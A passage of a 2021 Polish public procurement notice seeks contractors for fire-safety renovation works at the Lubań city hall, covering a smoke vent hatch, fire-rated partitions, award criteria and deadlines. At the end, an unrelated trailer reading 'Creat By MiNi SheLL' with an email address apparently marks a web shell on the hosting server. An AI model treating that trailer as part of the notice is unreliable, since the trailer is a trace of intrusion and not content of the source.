drzwiowego i obsadzeniu nowych drzwi<br/>•	wykonanie tunelu klapy dymowej w postaci ścianki systemowej REI 120 na konstrukcji stalowej .<br/><br/>Przedmiotem Zamówienia są roboty remontowe w budynku Urzędu Miasta przy ul. 7 Dywizji 14 w Lubaniu w zakresie dostosowania do obowiązujących przepisów przeciwpożarowych.<br/>Przedmiotowy budynek pełni rolę siedziby Urzędu Miasta Lubań i Banku BGŻ BNP Paribas S.A. Oddział w Lubaniu. Położony jest u zbiegu ulic 7 Dywizji i Lwóweckiej - w obrębie ścisłej zabudowy miejskiej. Jest to budynek całkowicie podpiwniczony, wykonany w konstrukcji tradycyjnej - murowanej, o podłużnym układzie ścian konstrukcyjnych, z pięcioma kondygnacjami wydzielonymi w większości za pomocą stropów typu Kleina. Budynek przykryty dwuspadowym stropodachem. Komunikację pionową wewnątrz budynku, poza spiralnymi schodami prowadzącymi na poddasze, zapewniają schody żelbetowe. Przy budynku zlokalizowano parking o nawierzchni z kostki betonowej, przeznaczony dla samochodów osobowych, służący petentom U.M. Lubań oraz klientom banku. Budynek wyposażony jest w następujące instalacje:<br/>	ciepłej i zimnej wody użytkowej,<br/>	hydrantową,<br/>	centralnego ogrzewania,<br/>	kanalizacji deszczowej,<br/>	kanalizacji sanitarnej,<br/>	gazową (instalacja jedynie we fragmencie piwnicy - pozostała zdemontowana kilka lat temu),<br/>	elektryczną,<br/>	odgromową,<br/>	telefoniczną,<br/>	internetową,<br/>	monitoringu zewnętrznego,<br/>	alarmową<br/><br/>Zakres robót objętych zamówieniem:<br/>•	wykucie otworu w stropie II piętra i stropodachu (otwór 2,0x1.35 ) pod klapę oddymiającą<br/>•	zmiana lokalizacji drzwi (0,8x2,0) pomieszczenia strychowego <br/>•	wykonanie tunelu klapy dymowej w postaci ścianki systemowej REI 120 na konstrukcji stalowej <br/>We wskazanym miejscu na rys. nr 11, należy wykonać otwory w stropie między II piętrem a poddaszem i w stropodachu nad poddaszem. Po usunięciu warstw wykończeniowych sufitu i podłogi stropu i odkryciu elementów konstrukcyjnych stropu i poddasza należy skonsultować z osobą posiadającą odpowiednie uprawnienia linię cięcia w konstrukcji stropowej. Roboty należy prowadzić ze szczególną ostrożnością i zasadami BHP przy tego typu pracach rozbiórkowych. W kondygnacji poddasza zostanie wykonany tunel klapy dymowej. Tworzyć go będą cztery ścianki działowe tworząc szyb o wymiarach w świetle 1,35 x 1,85 m. Jeden bok szybu stanowić będzie istniejąca ścianka działowa murowana, natomiast pozostałe boki zostaną utworzone poprzez zamontowanie ścianek systemowych w klasie REI 120 odporności ogniowej. Ścianki te należy wykonać w systemie dowolnego producenta systemów zabudowy oddzieleń przeciwpożarowych stosując się ściśle do jego wytycznych w zakresie montowanych materiałów i sposobu wykonania. Rysunek szczegółu materiałowo - montażowego pokazano na rys. nr 11 i 13. Drzwi wejściowe do pomieszczenia gospodarczego, w którym montowany będzie szyb klapy dymowej, należy przenieść w miejsce wskazane na rys. nr 11, a pozostający otwór zamurować cegłami ceramicznymi pełnymi.<br/><br/>•	montaż klapy dymowej z napędem (siłowniki dedykowane tej klapie)<br/>Oddymianie klatki schodowej realizowane będzie za pomocą klapy dymowej 115 x 200 z owiewkami i kierownicą o powierzchni czynnej oddymiania A cz = 1,84 m2. Klapa oddymiająca jest częścią grawitacyjnego systemu oddymiania i służy do odprowadzania z wnętrza budynku dymu i ciepła powstającego w trakcie pożaru. Podczas normalnych warunków eksploatacji może służyć do przewietrzania i doświetlenia pomieszczenia. Posiada siłowniki elektryczne (24V), które poprzez sygnał elektryczny podany z systemu sterowania, podnoszą skrzydło. Klapę oddymiającą należy dobrać stosując się do podstawowych założeń przedstawionych na rys. nr 13. <br/>Klapa dymowa musi spełniać następujące warunki:<br/>-	podstawa o budowie prostej,<br/>-	podstawa prosta wykonana z blachy ocynkowanej o grubości minimum 1,5 mm,<br/>-	spód podstawy z kołnierzem montażowym,<br/>-	przewidziana przestrzeń na izolację termiczną o grubości 50 mm,<br/>-	konstrukcja skrzydła klapy wykonana z kształtowników stalowych o przekroju zamkniętym, ocynkowana ogniowo,<br/>-	wypełnienie skrzydła klapy dwukomorową płytą poliwęglanową o grubości minimum 10 mm<br/>Siłowniki klapy dymowej<br/>Siłowniki klapy dymowej wykonać zgodnie z przepisami i w oparciu o obowiązujące normy.<br/>Siłowniki powinny być dedykowane do klapy i być elementem wspólnego dopuszczenia (certyfikatu) wraz z klapą dymową.<br/><br/>•	wykonanie obudowy stalowego szybu wentylacyjnego ścianką systemową REI 120 na konstrukcji stalowej<br/>Szyb wentylacyjny, w postaci stalowych przewodów o przekroju kwadratowym 50 x 50cm, występujący w pomieszczeniu archiwum na poddaszu budynku, należy obudować w klasie REI 120 systemową zabudową do szybów instalacyjnych. Ścianki obudowy należy wykonać w systemie dowolnego producenta systemów zabudowy oddzieleń przeciwpożarowych stosując się ściśle do jego wytycznych w zakresie montowanych materiałów i sposobu wykonania. Rysunek szczegółu materiałowo - montażowego pokazano na rys. nr 11.<br/><br/>•	uzupełnienia tynków po przekuciach<br/>•	roboty malarskie tynków wewnętrznych ścian i stropów ( ścianki systemowe, ściany i strop po przekuciach)<br/>•	malowanie stalowych belek dwuteowych 220 farbą ogniochronną do klasy R30 <br/>Wszystkie belki stalowe NP 220 na poddaszu stanowiące dźwigary dachowe należy pomalować farbami ogniochronnymi do uzyskania klasy R30 odporności ogniowej. W tym celu należy zastosować atestowane, pęczniejące farby do konstrukcji stalowych. Technologia prawidłowego naniesienia powłok malarskich określona jest kartach produktu. Grubość warstwy właściwej należy dobrać dla masywności profilu U/A = 196.<br/><br/>Wykonanie tych robót związane jest z utrudnieniami na czynnym obiekcie. Wymagane jest zapewnienie dostępu petentom w godzinach pracy urzędu oraz stałe utrzymywanie czystości.<br/><br/>Część rysunkowa do opisu przedmiotu zamówienia:<br/>1.	Rzut II piętra przebudowa: <br/>( na rysunku wskazano lokalizację tunelu klapy oddymiającej w poziomie II piętra)<br/>2.	Rzut poddasza przebudowa: <br/>( na rysunku wskazano lokalizację tunelu klapy oddymiającej, lokalizację przeniesionych drzwi pomieszczenia gospodarczego oraz obudowę szybu wentylacyjnego)<br/>3.	Przekrój A-A przebudowa:<br/>( na rysunku wskazano szczegóły lokalizacji tunelu i klapy oddymiającej oraz obudowy szybu wentylacyjnego)<br/>4.	Konstrukcja klapy dymowej: <br/>( na rysunku wskazano szczegóły klapy dymowej) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45261214-7 - Kładzenie dachów bitumicznych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną polegającą na przebudowie lub remoncie dachu wraz z montażem instalacji fotowoltaicznej o łącznej mocy co najmniej 15 kW. <br/>b) Wykonawca spełni warunek jeżeli wykaże, że w okresie realizacji zamówienia będzie dysponował osobami posiadającymi następujące uprawnienia budowlane:<br/>- kierownikiem budowy – co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji przedmiotu zamówienia, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ;<br/>- Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>- wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przewidziane w projektowanych postanowieniach umowy, który stanowi załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Gmina Miejska Lubań ul. 7 Dywizji 14, 59-800 Lubań</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-23 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com